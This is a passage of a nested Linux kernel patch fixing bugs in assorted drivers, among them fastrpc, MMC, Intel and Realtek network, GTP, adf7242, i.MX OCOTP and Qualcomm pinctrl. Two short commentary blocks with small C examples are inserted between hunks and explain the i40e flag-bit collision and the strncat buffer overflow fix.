++	mcb_release_bus(priv->bus);
++	return ret;
+ }
+ 
+ static int mcb_lpc_remove(struct platform_device *pdev)
+diff --git a/drivers/mcb/mcb-parse.c b/drivers/mcb/mcb-parse.c
+index c41cbacc75a2c..656b6b71c7682 100644
+--- a/drivers/mcb/mcb-parse.c
++++ b/drivers/mcb/mcb-parse.c
+@@ -128,7 +128,7 @@ static void chameleon_parse_bar(void __iomem *base,
+ 	}
+ }
+ 
+-static int chameleon_get_bar(char __iomem **base, phys_addr_t mapbase,
++static int chameleon_get_bar(void __iomem **base, phys_addr_t mapbase,
+ 			     struct chameleon_bar **cb)
+ {
+ 	struct chameleon_bar *c;
+@@ -177,12 +177,13 @@ int chameleon_parse_cells(struct mcb_bus *bus, phys_addr_t mapbase,
+ {
+ 	struct chameleon_fpga_header *header;
+ 	struct chameleon_bar *cb;
+-	char __iomem *p = base;
++	void __iomem *p = base;
+ 	int num_cells = 0;
+ 	uint32_t dtype;
+ 	int bar_count;
+ 	int ret;
+ 	u32 hsize;
++	u32 table_size;
+ 
+ 	hsize = sizeof(struct chameleon_fpga_header);
+ 
+@@ -237,12 +238,16 @@ int chameleon_parse_cells(struct mcb_bus *bus, phys_addr_t mapbase,
+ 		num_cells++;
+ 	}
+ 
+-	if (num_cells == 0)
+-		num_cells = -EINVAL;
++	if (num_cells == 0) {
++		ret = -EINVAL;
++		goto free_bar;
++	}
+ 
++	table_size = p - base;
++	pr_debug("%d cell(s) found. Chameleon table size: 0x%04x bytes\n", num_cells, table_size);
+ 	kfree(cb);
+ 	kfree(header);
+-	return num_cells;
++	return table_size;
+ 
+ free_bar:
+ 	kfree(cb);
+diff --git a/drivers/misc/fastrpc.c b/drivers/misc/fastrpc.c
+index 4c51d216f3d43..cc57cc8204328 100644
+--- a/drivers/misc/fastrpc.c
++++ b/drivers/misc/fastrpc.c
+@@ -903,6 +903,7 @@ static int fastrpc_get_args(u32 kernel, struct fastrpc_invoke_ctx *ctx)
+ 	if (err)
+ 		return err;
+ 
++	memset(ctx->buf->virt, 0, pkt_size);
+ 	rpra = ctx->buf->virt;
+ 	list = fastrpc_invoke_buf_start(rpra, ctx->nscalars);
+ 	pages = fastrpc_phy_page_start(list, ctx->nscalars);
+@@ -1035,6 +1036,7 @@ static int fastrpc_put_args(struct fastrpc_invoke_ctx *ctx,
+ 		}
+ 	}
+ 
++	/* Clean up fdlist which is updated by DSP */
+ 	for (i = 0; i < FASTRPC_MAX_FDLIST; i++) {
+ 		if (!fdlist[i])
+ 			break;
+@@ -1099,11 +1101,9 @@ static int fastrpc_internal_invoke(struct fastrpc_user *fl,  u32 kernel,
+ 	if (IS_ERR(ctx))
+ 		return PTR_ERR(ctx);
+ 
+-	if (ctx->nscalars) {
+-		err = fastrpc_get_args(kernel, ctx);
+-		if (err)
+-			goto bail;
+-	}
++	err = fastrpc_get_args(kernel, ctx);
++	if (err)
++		goto bail;
+ 
+ 	/* make sure that all CPU memory writes are seen by DSP */
+ 	dma_wmb();
+@@ -1119,6 +1119,13 @@ static int fastrpc_internal_invoke(struct fastrpc_user *fl,  u32 kernel,
+ 		err = wait_for_completion_interruptible(&ctx->work);
+ 	}
+ 
++	if (err)
++		goto bail;
++
++	/* make sure that all memory writes by DSP are seen by CPU */
++	dma_rmb();
++	/* populate all the output buffers with results */
++	err = fastrpc_put_args(ctx, kernel);
+ 	if (err)
+ 		goto bail;
+ 
+@@ -1127,15 +1134,6 @@ static int fastrpc_internal_invoke(struct fastrpc_user *fl,  u32 kernel,
+ 	if (err)
+ 		goto bail;
+ 
+-	if (ctx->nscalars) {
+-		/* make sure that all memory writes by DSP are seen by CPU */
+-		dma_rmb();
+-		/* populate all the output buffers with results */
+-		err = fastrpc_put_args(ctx, kernel);
+-		if (err)
+-			goto bail;
+-	}
+-
+ bail:
+ 	if (err != -ERESTARTSYS && err != -ETIMEDOUT) {
+ 		/* We are done with this compute context */
+@@ -1785,11 +1783,13 @@ static int fastrpc_req_mem_unmap_impl(struct fastrpc_user *fl, struct fastrpc_me
+ 	sc = FASTRPC_SCALARS(FASTRPC_RMID_INIT_MEM_UNMAP, 1, 0);
+ 	err = fastrpc_internal_invoke(fl, true, FASTRPC_INIT_HANDLE, sc,
+ 				      &args[0]);
+-	fastrpc_map_put(map);
+-	if (err)
++	if (err) {
+ 		dev_err(dev, "unmmap\tpt fd = %d, 0x%09llx error\n",  map->fd, map->raddr);
++		return err;
++	}
++	fastrpc_map_put(map);
+ 
+-	return err;
++	return 0;
+ }
+ 
+ static int fastrpc_req_mem_unmap(struct fastrpc_user *fl, char __user *argp)
+diff --git a/drivers/mmc/core/block.c b/drivers/mmc/core/block.c
+index cdd7f126d4aea..1fc6767f18782 100644
+--- a/drivers/mmc/core/block.c
++++ b/drivers/mmc/core/block.c
+@@ -180,6 +180,8 @@ static void mmc_blk_rw_rq_prep(struct mmc_queue_req *mqrq,
+ 			       int recovery_mode,
+ 			       struct mmc_queue *mq);
+ static void mmc_blk_hsq_req_done(struct mmc_request *mrq);
++static int mmc_spi_err_check(struct mmc_card *card);
++static int mmc_blk_busy_cb(void *cb_data, bool *busy);
+ 
+ static struct mmc_blk_data *mmc_blk_get(struct gendisk *disk)
+ {
+@@ -471,6 +473,8 @@ static int __mmc_blk_ioctl_cmd(struct mmc_card *card, struct mmc_blk_data *md,
+ 	struct mmc_data data = {};
+ 	struct mmc_request mrq = {};
+ 	struct scatterlist sg;
++	bool r1b_resp;
++	unsigned int busy_timeout_ms;
+ 	int err;
+ 	unsigned int target_part;
+ 
+@@ -559,6 +563,12 @@ static int __mmc_blk_ioctl_cmd(struct mmc_card *card, struct mmc_blk_data *md,
+ 	    (cmd.opcode == MMC_SWITCH))
+ 		return mmc_sanitize(card, idata->ic.cmd_timeout_ms);
+ 
++	/* If it's an R1B response we need some more preparations. */
++	busy_timeout_ms = idata->ic.cmd_timeout_ms ? : MMC_BLK_TIMEOUT_MS;
++	r1b_resp = (cmd.flags & MMC_RSP_R1B) == MMC_RSP_R1B;
++	if (r1b_resp)
++		mmc_prepare_busy_cmd(card->host, &cmd, busy_timeout_ms);
++
+ 	mmc_wait_for_req(card->host, &mrq);
+ 	memcpy(&idata->ic.response, cmd.resp, sizeof(cmd.resp));
+ 
+@@ -610,13 +620,27 @@ static int __mmc_blk_ioctl_cmd(struct mmc_card *card, struct mmc_blk_data *md,
+ 	if (idata->ic.postsleep_min_us)
+ 		usleep_range(idata->ic.postsleep_min_us, idata->ic.postsleep_max_us);
+ 
+-	if (idata->rpmb || (cmd.flags & MMC_RSP_R1B) == MMC_RSP_R1B) {
+-		/*
+-		 * Ensure RPMB/R1B command has completed by polling CMD13 "Send Status". Here we
+-		 * allow to override the default timeout value if a custom timeout is specified.
+-		 */
+-		err = mmc_poll_for_busy(card, idata->ic.cmd_timeout_ms ? : MMC_BLK_TIMEOUT_MS,
+-					false, MMC_BUSY_IO);
++	if (mmc_host_is_spi(card->host)) {
++		if (idata->ic.write_flag || r1b_resp || cmd.flags & MMC_RSP_SPI_BUSY)
++			return mmc_spi_err_check(card);
++		return err;
++	}
++
++	/*
++	 * Ensure RPMB, writes and R1B responses are completed by polling with
++	 * CMD13. Note that we usually don't need to poll when using HW busy
++	 * detection, but here it's needed since some commands may indicate the
++	 * error through the R1 status bits.
++	 */
++	if (idata->rpmb || idata->ic.write_flag || r1b_resp) {
++		struct mmc_blk_busy_data cb_data = {
++			.card = card,
++		};
++
++		err = __mmc_poll_for_busy(card->host, 0, busy_timeout_ms,
++					  &mmc_blk_busy_cb, &cb_data);
++
++		idata->ic.response[0] = cb_data.status;
+ 	}
+ 
+ 	return err;
+diff --git a/drivers/mmc/core/mmc_ops.c b/drivers/mmc/core/mmc_ops.c
+index 81c55bfd6e0c2..3b3adbddf6641 100644
+--- a/drivers/mmc/core/mmc_ops.c
++++ b/drivers/mmc/core/mmc_ops.c
+@@ -575,6 +575,7 @@ bool mmc_prepare_busy_cmd(struct mmc_host *host, struct mmc_command *cmd,
+ 	cmd->busy_timeout = timeout_ms;
+ 	return true;
+ }
++EXPORT_SYMBOL_GPL(mmc_prepare_busy_cmd);
+ 
+ /**
+  *	__mmc_switch - modify EXT_CSD register
+diff --git a/drivers/net/ethernet/adi/adin1110.c b/drivers/net/ethernet/adi/adin1110.c
+index ed2863ed6a5bb..7474afc0e8e73 100644
+--- a/drivers/net/ethernet/adi/adin1110.c
++++ b/drivers/net/ethernet/adi/adin1110.c
+@@ -294,7 +294,7 @@ static int adin1110_read_fifo(struct adin1110_port_priv *port_priv)
+ {
+ 	struct adin1110_priv *priv = port_priv->priv;
+ 	u32 header_len = ADIN1110_RD_HEADER_LEN;
+-	struct spi_transfer t;
++	struct spi_transfer t = {0};
+ 	u32 frame_size_no_fcs;
+ 	struct sk_buff *rxb;
+ 	u32 frame_size;
+diff --git a/drivers/net/ethernet/intel/i40e/i40e.h b/drivers/net/ethernet/intel/i40e/i40e.h
+index a81f918091ccf..7d4cc4eafd59e 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e.h
++++ b/drivers/net/ethernet/intel/i40e/i40e.h
+@@ -580,7 +580,6 @@ struct i40e_pf {
+ #define I40E_FLAG_DISABLE_FW_LLDP		BIT(24)
+ #define I40E_FLAG_RS_FEC			BIT(25)
+ #define I40E_FLAG_BASE_R_FEC			BIT(26)
+-#define I40E_FLAG_VF_VLAN_PRUNING		BIT(27)
+ /* TOTAL_PORT_SHUTDOWN
+  * Allows to physically disable the link on the NIC's port.
+  * If enabled, (after link down request from the OS)
+@@ -603,6 +602,7 @@ struct i40e_pf {
+  *   in abilities field of i40e_aq_set_phy_config structure
+  */
+ #define I40E_FLAG_TOTAL_PORT_SHUTDOWN_ENABLED	BIT(27)
++#define I40E_FLAG_VF_VLAN_PRUNING		BIT(28)
+ 
+ 	struct i40e_client_instance *cinst;
+ 	bool stat_offsets_loaded;
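
The bug fixed above is a plain bit collision: I40E_FLAG_VF_VLAN_PRUNING shared
BIT(27) with I40E_FLAG_TOTAL_PORT_SHUTDOWN_ENABLED, so testing either flag
returned true whenever the other was set. A minimal stand-alone illustration
(names invented):

	#include <stdio.h>

	#define BIT(n)			(1u << (n))
	#define FLAG_PORT_SHUTDOWN	BIT(27)
	#define FLAG_PRUNING_OLD	BIT(27)	/* buggy: collides */
	#define FLAG_PRUNING_NEW	BIT(28)	/* fixed: unique bit */

	int main(void)
	{
		unsigned int flags = FLAG_PORT_SHUTDOWN;

		printf("old check misfires: %d\n", !!(flags & FLAG_PRUNING_OLD));
		printf("new check correct: %d\n", !!(flags & FLAG_PRUNING_NEW));
		return 0;
	}
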
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_txrx.c b/drivers/net/ethernet/intel/i40e/i40e_txrx.c
+index 494775d65bf28..6d26ee8eefae9 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_txrx.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_txrx.c
+@@ -2770,7 +2770,7 @@ tx_only:
+ 		return budget;
+ 	}
+ 
+-	if (vsi->back->flags & I40E_TXR_FLAGS_WB_ON_ITR)
++	if (q_vector->tx.ring[0].flags & I40E_TXR_FLAGS_WB_ON_ITR)
+ 		q_vector->arm_wb_state = false;
+ 
+ 	/* Exit the polling mode, but don't re-enable interrupts if stack might
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_main.c b/drivers/net/ethernet/intel/iavf/iavf_main.c
+index a39f7f0d6ab0b..326bb5fdf5f90 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_main.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_main.c
+@@ -1449,9 +1449,9 @@ void iavf_down(struct iavf_adapter *adapter)
+ 			adapter->aq_required |= IAVF_FLAG_AQ_DEL_FDIR_FILTER;
+ 		if (!list_empty(&adapter->adv_rss_list_head))
+ 			adapter->aq_required |= IAVF_FLAG_AQ_DEL_ADV_RSS_CFG;
+-		adapter->aq_required |= IAVF_FLAG_AQ_DISABLE_QUEUES;
+ 	}
+ 
++	adapter->aq_required |= IAVF_FLAG_AQ_DISABLE_QUEUES;
+ 	mod_delayed_work(adapter->wq, &adapter->watchdog_task, 0);
+ }
+ 
+@@ -5020,8 +5020,6 @@ static int iavf_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 	INIT_WORK(&adapter->finish_config, iavf_finish_config);
+ 	INIT_DELAYED_WORK(&adapter->watchdog_task, iavf_watchdog_task);
+ 	INIT_DELAYED_WORK(&adapter->client_task, iavf_client_task);
+-	queue_delayed_work(adapter->wq, &adapter->watchdog_task,
+-			   msecs_to_jiffies(5 * (pdev->devfn & 0x07)));
+ 
+ 	/* Setup the wait queue for indicating transition to down status */
+ 	init_waitqueue_head(&adapter->down_waitqueue);
+@@ -5032,6 +5030,9 @@ static int iavf_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 	/* Setup the wait queue for indicating virtchannel events */
+ 	init_waitqueue_head(&adapter->vc_waitqueue);
+ 
++	queue_delayed_work(adapter->wq, &adapter->watchdog_task,
++			   msecs_to_jiffies(5 * (pdev->devfn & 0x07)));
++	/* Initialization continues in the watchdog work. Do not add more of it below. */
+ 	return 0;
+ 
+ err_ioremap:
+diff --git a/drivers/net/ethernet/intel/igb/igb_ethtool.c b/drivers/net/ethernet/intel/igb/igb_ethtool.c
+index 96fa1c420f910..ceff537d9d22d 100644
+--- a/drivers/net/ethernet/intel/igb/igb_ethtool.c
++++ b/drivers/net/ethernet/intel/igb/igb_ethtool.c
+@@ -2978,11 +2978,15 @@ static int igb_add_ethtool_nfc_entry(struct igb_adapter *adapter,
+ 	if (err)
+ 		goto err_out_w_lock;
+ 
+-	igb_update_ethtool_nfc_entry(adapter, input, input->sw_idx);
++	err = igb_update_ethtool_nfc_entry(adapter, input, input->sw_idx);
++	if (err)
++		goto err_out_input_filter;
+ 
+ 	spin_unlock(&adapter->nfc_lock);
+ 	return 0;
+ 
++err_out_input_filter:
++	igb_erase_filter(adapter, input);
+ err_out_w_lock:
+ 	spin_unlock(&adapter->nfc_lock);
+ err_out:
+diff --git a/drivers/net/ethernet/intel/igc/igc_ethtool.c b/drivers/net/ethernet/intel/igc/igc_ethtool.c
+index e23b95edb05ef..81897f7a90a91 100644
+--- a/drivers/net/ethernet/intel/igc/igc_ethtool.c
++++ b/drivers/net/ethernet/intel/igc/igc_ethtool.c
+@@ -1817,7 +1817,7 @@ igc_ethtool_set_link_ksettings(struct net_device *netdev,
+ 	struct igc_adapter *adapter = netdev_priv(netdev);
+ 	struct net_device *dev = adapter->netdev;
+ 	struct igc_hw *hw = &adapter->hw;
+-	u32 advertising;
++	u16 advertised = 0;
+ 
+ 	/* When adapter in resetting mode, autoneg/speed/duplex
+ 	 * cannot be changed
+@@ -1842,18 +1842,33 @@ igc_ethtool_set_link_ksettings(struct net_device *netdev,
+ 	while (test_and_set_bit(__IGC_RESETTING, &adapter->state))
+ 		usleep_range(1000, 2000);
+ 
+-	ethtool_convert_link_mode_to_legacy_u32(&advertising,
+-						cmd->link_modes.advertising);
+-	/* Converting to legacy u32 drops ETHTOOL_LINK_MODE_2500baseT_Full_BIT.
+-	 * We have to check this and convert it to ADVERTISE_2500_FULL
+-	 * (aka ETHTOOL_LINK_MODE_2500baseX_Full_BIT) explicitly.
+-	 */
+-	if (ethtool_link_ksettings_test_link_mode(cmd, advertising, 2500baseT_Full))
+-		advertising |= ADVERTISE_2500_FULL;
++	if (ethtool_link_ksettings_test_link_mode(cmd, advertising,
++						  2500baseT_Full))
++		advertised |= ADVERTISE_2500_FULL;
++
++	if (ethtool_link_ksettings_test_link_mode(cmd, advertising,
++						  1000baseT_Full))
++		advertised |= ADVERTISE_1000_FULL;
++
++	if (ethtool_link_ksettings_test_link_mode(cmd, advertising,
++						  100baseT_Full))
++		advertised |= ADVERTISE_100_FULL;
++
++	if (ethtool_link_ksettings_test_link_mode(cmd, advertising,
++						  100baseT_Half))
++		advertised |= ADVERTISE_100_HALF;
++
++	if (ethtool_link_ksettings_test_link_mode(cmd, advertising,
++						  10baseT_Full))
++		advertised |= ADVERTISE_10_FULL;
++
++	if (ethtool_link_ksettings_test_link_mode(cmd, advertising,
++						  10baseT_Half))
++		advertised |= ADVERTISE_10_HALF;
+ 
+ 	if (cmd->base.autoneg == AUTONEG_ENABLE) {
+ 		hw->mac.autoneg = 1;
+-		hw->phy.autoneg_advertised = advertising;
++		hw->phy.autoneg_advertised = advertised;
+ 		if (adapter->fc_autoneg)
+ 			hw->fc.requested_mode = igc_fc_default;
+ 	} else {
+diff --git a/drivers/net/ethernet/realtek/r8169_main.c b/drivers/net/ethernet/realtek/r8169_main.c
+index a9a0dca0c0305..80b6079b8a8e3 100644
+--- a/drivers/net/ethernet/realtek/r8169_main.c
++++ b/drivers/net/ethernet/realtek/r8169_main.c
+@@ -4343,7 +4343,7 @@ static void rtl_tx(struct net_device *dev, struct rtl8169_private *tp,
+ 		unsigned int entry = dirty_tx % NUM_TX_DESC;
+ 		u32 status;
+ 
+-		status = le32_to_cpu(tp->TxDescArray[entry].opts1);
++		status = le32_to_cpu(READ_ONCE(tp->TxDescArray[entry].opts1));
+ 		if (status & DescOwn)
+ 			break;
+ 
+@@ -4380,7 +4380,7 @@ static void rtl_tx(struct net_device *dev, struct rtl8169_private *tp,
+ 		 * If skb is NULL then we come here again once a tx irq is
+ 		 * triggered after the last fragment is marked transmitted.
+ 		 */
+-		if (tp->cur_tx != dirty_tx && skb)
++		if (READ_ONCE(tp->cur_tx) != dirty_tx && skb)
+ 			rtl8169_doorbell(tp);
+ 	}
+ }
+@@ -4413,7 +4413,7 @@ static int rtl_rx(struct net_device *dev, struct rtl8169_private *tp, int budget
+ 		dma_addr_t addr;
+ 		u32 status;
+ 
+-		status = le32_to_cpu(desc->opts1);
++		status = le32_to_cpu(READ_ONCE(desc->opts1));
+ 		if (status & DescOwn)
+ 			break;
+ 
+diff --git a/drivers/net/ethernet/toshiba/ps3_gelic_wireless.c b/drivers/net/ethernet/toshiba/ps3_gelic_wireless.c
+index dc14a66583ff3..44488c153ea25 100644
+--- a/drivers/net/ethernet/toshiba/ps3_gelic_wireless.c
++++ b/drivers/net/ethernet/toshiba/ps3_gelic_wireless.c
+@@ -1217,7 +1217,7 @@ static int gelic_wl_set_encodeext(struct net_device *netdev,
+ 		key_index = wl->current_key;
+ 
+ 	if (!enc->length && (ext->ext_flags & IW_ENCODE_EXT_SET_TX_KEY)) {
+-		/* reques to change default key index */
++		/* request to change default key index */
+ 		pr_debug("%s: request to change default key to %d\n",
+ 			 __func__, key_index);
+ 		wl->current_key = key_index;
+diff --git a/drivers/net/gtp.c b/drivers/net/gtp.c
+index acb20ad4e37eb..477b4d4f860bd 100644
+--- a/drivers/net/gtp.c
++++ b/drivers/net/gtp.c
+@@ -871,8 +871,9 @@ static int gtp_build_skb_ip4(struct sk_buff *skb, struct net_device *dev,
+ 
+ 	skb_dst_update_pmtu_no_confirm(skb, mtu);
+ 
+-	if (!skb_is_gso(skb) && (iph->frag_off & htons(IP_DF)) &&
+-	    mtu < ntohs(iph->tot_len)) {
++	if (iph->frag_off & htons(IP_DF) &&
++	    ((!skb_is_gso(skb) && skb->len > mtu) ||
++	     (skb_is_gso(skb) && !skb_gso_validate_network_len(skb, mtu)))) {
+ 		netdev_dbg(dev, "packet too big, fragmentation needed\n");
+ 		icmp_ndo_send(skb, ICMP_DEST_UNREACH, ICMP_FRAG_NEEDED,
+ 			      htonl(mtu));
+diff --git a/drivers/net/ieee802154/adf7242.c b/drivers/net/ieee802154/adf7242.c
+index 5cf218c674a5a..32d92bdabd234 100644
+--- a/drivers/net/ieee802154/adf7242.c
++++ b/drivers/net/ieee802154/adf7242.c
+@@ -1162,9 +1162,10 @@ static int adf7242_stats_show(struct seq_file *file, void *offset)
+ 
+ static void adf7242_debugfs_init(struct adf7242_local *lp)
+ {
+-	char debugfs_dir_name[DNAME_INLINE_LEN + 1] = "adf7242-";
++	char debugfs_dir_name[DNAME_INLINE_LEN + 1];
+ 
+-	strncat(debugfs_dir_name, dev_name(&lp->spi->dev), DNAME_INLINE_LEN);
++	snprintf(debugfs_dir_name, sizeof(debugfs_dir_name),
++		 "adf7242-%s", dev_name(&lp->spi->dev));
+ 
+ 	lp->debugfs_root = debugfs_create_dir(debugfs_dir_name, NULL);
+ 
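
strncat()'s size argument bounds the bytes appended, not the total buffer, so
with the 8-byte "adf7242-" prefix already in the array the old code could
write up to 8 bytes past the end. snprintf() bounds the whole buffer. A small
stand-alone sketch of the safe pattern (device name hypothetical):

	#include <stdio.h>

	int main(void)
	{
		char buf[16];

		/* Truncates instead of overflowing, prefix included. */
		snprintf(buf, sizeof(buf), "adf7242-%s", "spi1.0-hypothetical");
		puts(buf);
		return 0;
	}
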
+diff --git a/drivers/net/usb/r8152.c b/drivers/net/usb/r8152.c
+index fc1458f96e170..c34974f7dfd26 100644
+--- a/drivers/net/usb/r8152.c
++++ b/drivers/net/usb/r8152.c
+@@ -1211,7 +1211,7 @@ int get_registers(struct r8152 *tp, u16 value, u16 index, u16 size, void *data)
+ 
+ 	ret = usb_control_msg(tp->udev, tp->pipe_ctrl_in,
+ 			      RTL8152_REQ_GET_REGS, RTL8152_REQT_READ,
+-			      value, index, tmp, size, 500);
++			      value, index, tmp, size, USB_CTRL_GET_TIMEOUT);
+ 	if (ret < 0)
+ 		memset(data, 0xff, size);
+ 	else
+@@ -1234,7 +1234,7 @@ int set_registers(struct r8152 *tp, u16 value, u16 index, u16 size, void *data)
+ 
+ 	ret = usb_control_msg(tp->udev, tp->pipe_ctrl_out,
+ 			      RTL8152_REQ_SET_REGS, RTL8152_REQT_WRITE,
+-			      value, index, tmp, size, 500);
++			      value, index, tmp, size, USB_CTRL_SET_TIMEOUT);
+ 
+ 	kfree(tmp);
+ 
+@@ -9549,7 +9549,8 @@ u8 rtl8152_get_version(struct usb_interface *intf)
+ 
+ 	ret = usb_control_msg(udev, usb_rcvctrlpipe(udev, 0),
+ 			      RTL8152_REQ_GET_REGS, RTL8152_REQT_READ,
+-			      PLA_TCR0, MCU_TYPE_PLA, tmp, sizeof(*tmp), 500);
++			      PLA_TCR0, MCU_TYPE_PLA, tmp, sizeof(*tmp),
++			      USB_CTRL_GET_TIMEOUT);
+ 	if (ret > 0)
+ 		ocp_data = (__le32_to_cpu(*tmp) >> 16) & VERSION_MASK;
+ 
+@@ -9825,6 +9826,10 @@ static int rtl8152_probe(struct usb_interface *intf,
+ 
+ out1:
+ 	tasklet_kill(&tp->tx_tl);
++	cancel_delayed_work_sync(&tp->hw_phy_work);
++	if (tp->rtl_ops.unload)
++		tp->rtl_ops.unload(tp);
++	rtl8152_release_firmware(tp);
+ 	usb_set_intfdata(intf, NULL);
+ out:
+ 	free_netdev(netdev);
+diff --git a/drivers/net/usb/smsc95xx.c b/drivers/net/usb/smsc95xx.c
+index 17da42fe605c3..a530f20ee2575 100644
+--- a/drivers/net/usb/smsc95xx.c
++++ b/drivers/net/usb/smsc95xx.c
+@@ -95,7 +95,9 @@ static int __must_check smsc95xx_read_reg(struct usbnet *dev, u32 index,
+ 	ret = fn(dev, USB_VENDOR_REQUEST_READ_REGISTER, USB_DIR_IN
+ 		 | USB_TYPE_VENDOR | USB_RECIP_DEVICE,
+ 		 0, index, &buf, 4);
+-	if (ret < 0) {
++	if (ret < 4) {
++		ret = ret < 0 ? ret : -ENODATA;
++
+ 		if (ret != -ENODEV)
+ 			netdev_warn(dev->net, "Failed to read reg index 0x%08x: %d\n",
+ 				    index, ret);
+diff --git a/drivers/nvmem/imx-ocotp.c b/drivers/nvmem/imx-ocotp.c
+index 14284e866f26e..9590a864efd56 100644
+--- a/drivers/nvmem/imx-ocotp.c
++++ b/drivers/nvmem/imx-ocotp.c
+@@ -506,7 +506,7 @@ static const struct ocotp_params imx6sl_params = {
+ };
+ 
+ static const struct ocotp_params imx6sll_params = {
+-	.nregs = 128,
++	.nregs = 80,
+ 	.bank_address_words = 0,
+ 	.set_timing = imx_ocotp_set_imx6_timing,
+ 	.ctrl = IMX_OCOTP_BM_CTRL_DEFAULT,
+@@ -520,14 +520,14 @@ static const struct ocotp_params imx6sx_params = {
+ };
+ 
+ static const struct ocotp_params imx6ul_params = {
+-	.nregs = 128,
++	.nregs = 144,
+ 	.bank_address_words = 0,
+ 	.set_timing = imx_ocotp_set_imx6_timing,
+ 	.ctrl = IMX_OCOTP_BM_CTRL_DEFAULT,
+ };
+ 
+ static const struct ocotp_params imx6ull_params = {
+-	.nregs = 64,
++	.nregs = 80,
+ 	.bank_address_words = 0,
+ 	.set_timing = imx_ocotp_set_imx6_timing,
+ 	.ctrl = IMX_OCOTP_BM_CTRL_DEFAULT,
+diff --git a/drivers/pinctrl/qcom/pinctrl-lpass-lpi.c b/drivers/pinctrl/qcom/pinctrl-lpass-lpi.c
+index a55998ae29fa4..bfcc5c45b8fa5 100644
+--- a/drivers/pinctrl/qcom/pinctrl-lpass-lpi.c
++++ b/drivers/pinctrl/qcom/pinctrl-lpass-lpi.c
+@@ -24,7 +24,8 @@ struct lpi_pinctrl {
+ 	char __iomem *tlmm_base;
+ 	char __iomem *slew_base;
+ 	struct clk_bulk_data clks[MAX_LPI_NUM_CLKS];
+-	struct mutex slew_access_lock;
++	/* Protects from concurrent register updates */
++	struct mutex lock;
+ 	const struct lpi_pinctrl_variant_data *data;
+ };
+ 
+@@ -94,9 +95,11 @@ static int lpi_gpio_set_mux(struct pinctrl_dev *pctldev, unsigned int function,
+ 	if (WARN_ON(i == g->nfuncs))
+ 		return -EINVAL;
+ 
++	mutex_lock(&pctrl->lock);
+ 	val = lpi_gpio_read(pctrl, pin, LPI_GPIO_CFG_REG);
+ 	u32p_replace_bits(&val, i, LPI_GPIO_FUNCTION_MASK);
+ 	lpi_gpio_write(pctrl, pin, LPI_GPIO_CFG_REG, val);
++	mutex_unlock(&pctrl->lock);
+ 
+ 	return 0;
+ }
+@@ -202,14 +205,14 @@ static int lpi_config_set(struct pinctrl_dev *pctldev, unsigned int group,
+ 			if (slew_offset == LPI_NO_SLEW)
+ 				break;
+ 
+-			mutex_lock(&pctrl->slew_access_lock);
++			mutex_lock(&pctrl->lock);
+ 
+ 			sval = ioread32(pctrl->slew_base + LPI_SLEW_RATE_CTL_REG);
+ 			sval &= ~(LPI_SLEW_RATE_MASK << slew_offset);
+ 			sval |= arg << slew_offset;
+ 			iowrite32(sval, pctrl->slew_base + LPI_SLEW_RATE_CTL_REG);
+ 
+-			mutex_unlock(&pctrl->slew_access_lock);
++			mutex_unlock(&pctrl->lock);
+ 			break;
+ 		default:
+ 			return -EINVAL;
+@@ -225,6 +228,7 @@ static int lpi_config_set(struct pinctrl_dev *pctldev, unsigned int group,
+ 		lpi_gpio_write(pctrl, group, LPI_GPIO_VALUE_REG, val);
+ 	}
+ 
++	mutex_lock(&pctrl->lock);
+ 	val = lpi_gpio_read(pctrl, group, LPI_GPIO_CFG_REG);
+ 
+ 	u32p_replace_bits(&val, pullup, LPI_GPIO_PULL_MASK);
+@@ -233,6 +237,7 @@ static int lpi_config_set(struct pinctrl_dev *pctldev, unsigned int group,
+ 	u32p_replace_bits(&val, output_enabled, LPI_GPIO_OE_MASK);
+ 
+ 	lpi_gpio_write(pctrl, group, LPI_GPIO_CFG_REG, val);
++	mutex_unlock(&pctrl->lock);
+ 
+ 	return 0;
+ }
+@@ -432,7 +437,7 @@ int lpi_pinctrl_probe(struct platform_device *pdev)
+ 	pctrl->chip.of_gpio_n_cells = 2;
+ 	pctrl->chip.can_sleep = false;
+ 
+-	mutex_init(&pctrl->slew_access_lock);
++	mutex_init(&pctrl->lock);
+ 
+ 	pctrl->ctrl = devm_pinctrl_register(dev, &pctrl->desc, pctrl);
+ 	if (IS_ERR(pctrl->ctrl)) {
+@@ -454,7 +459,7 @@ int lpi_pinctrl_probe(struct platform_device *pdev)
+ 	return 0;
+ 
+ err_pinctrl:
+-	mutex_destroy(&pctrl->slew_access_lock);
++	mutex_destroy(&pctrl->lock);
+ 	clk_bulk_disable_unprepare(MAX_LPI_NUM_CLKS, pctrl->clks);
+ 
+ 	return ret;
+@@ -466,7 +471,7 @@ int lpi_pinctrl_remove(struct platform_device *pdev)
+ 	struct lpi_pinctrl *pctrl = platform_get_drvdata(pdev);
+ 	int i;
+ 
+-	mutex_destroy(&pctrl->slew_access_lock);
++	mutex_destroy(&pctrl->lock);
+ 	clk_bulk_disable_unprepare(MAX_LPI_NUM_CLKS, pctrl->clks);
+ 
+ 	for (i = 0; i < pctrl->data->npins; i++)
+diff --git a/drivers/platform/x86/thinkpad_acpi.c b/drivers/platform/x86/thinkpad_acpi.c
+index e7ece2738de94..3bb60687f2e42 100644
+--- a/drivers/platform/x86/thinkpad_acpi.c
++++ b/drivers/platform/x86/thinkpad_acpi.c
+@@ -4513,6 +4513,79 @@ static const struct dmi_system_id fwbug_list[] __initconst = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "21A1"),
+ 		}
+ 	},
++	/* https://bugzilla.kernel.org/show_bug.cgi?id=218024 */
++	{
++		.ident = "V14 G4 AMN",
++		.driver_data = &quirk_s2idle_bug,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "LENOVO"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "82YT"),
++		}
++	},
++	{
++		.ident = "V14 G4 AMN",
++		.driver_data = &quirk_s2idle_bug,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "LENOVO"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "83GE"),
++		}
++	},
++	{
++		.ident = "V15 G4 AMN",
++		.driver_data = &quirk_s2idle_bug,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "LENOVO"),
